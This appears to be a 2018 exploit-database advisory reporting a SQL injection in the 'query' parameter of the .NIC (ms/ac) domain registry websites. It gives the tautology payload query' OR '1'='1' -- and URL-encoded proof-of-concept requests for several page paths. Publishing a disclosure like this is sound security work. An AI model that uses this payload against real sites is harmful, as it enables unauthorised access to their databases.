.NIC(ms-ac) SQL Vulnerability

2018.01.02

Ozan Agdepe (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: .NIC SQL Vulnerability
# Google Dork: N/A
# Date: 02/01/2018
# Exploit Author: Ozan  Agdepe
# Vendor Homepage: http://nic.ms & http://nic.ac
# Tested on: KaliLinux_X64/Win 7-8-10_x64

########################

# Exploit Author: Ozan Agdepe
# Email: agdepeozan@gmail.com
# Author web: Agdepe.net
# Author twitter: @OAdepe
# Author GitHub: https://github.com/0z4nAgd3p3

# ###################

# SQL Injection Type: ByPass SQL İnjections
# Parameter: query
# Page: /news-item-1?query= & /robots.txt?query= & /hello-world/images/images?query= bla bla bla...
# Attack: query' OR '1'='1' --
# Description:
# The vulnerability allows an attacker to inject sql commands....

# Proof of Concept:

#1)
http://localhost/robots.txt?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/news-item-1?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/faqs?query=query%27+AND+%271%27%3D%271%27+--+

#####
# query%27+AND+%271%27%3D%271%27+--+

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

.NIC(ms-ac) SQL Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

.NIC(ms-ac) SQL Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.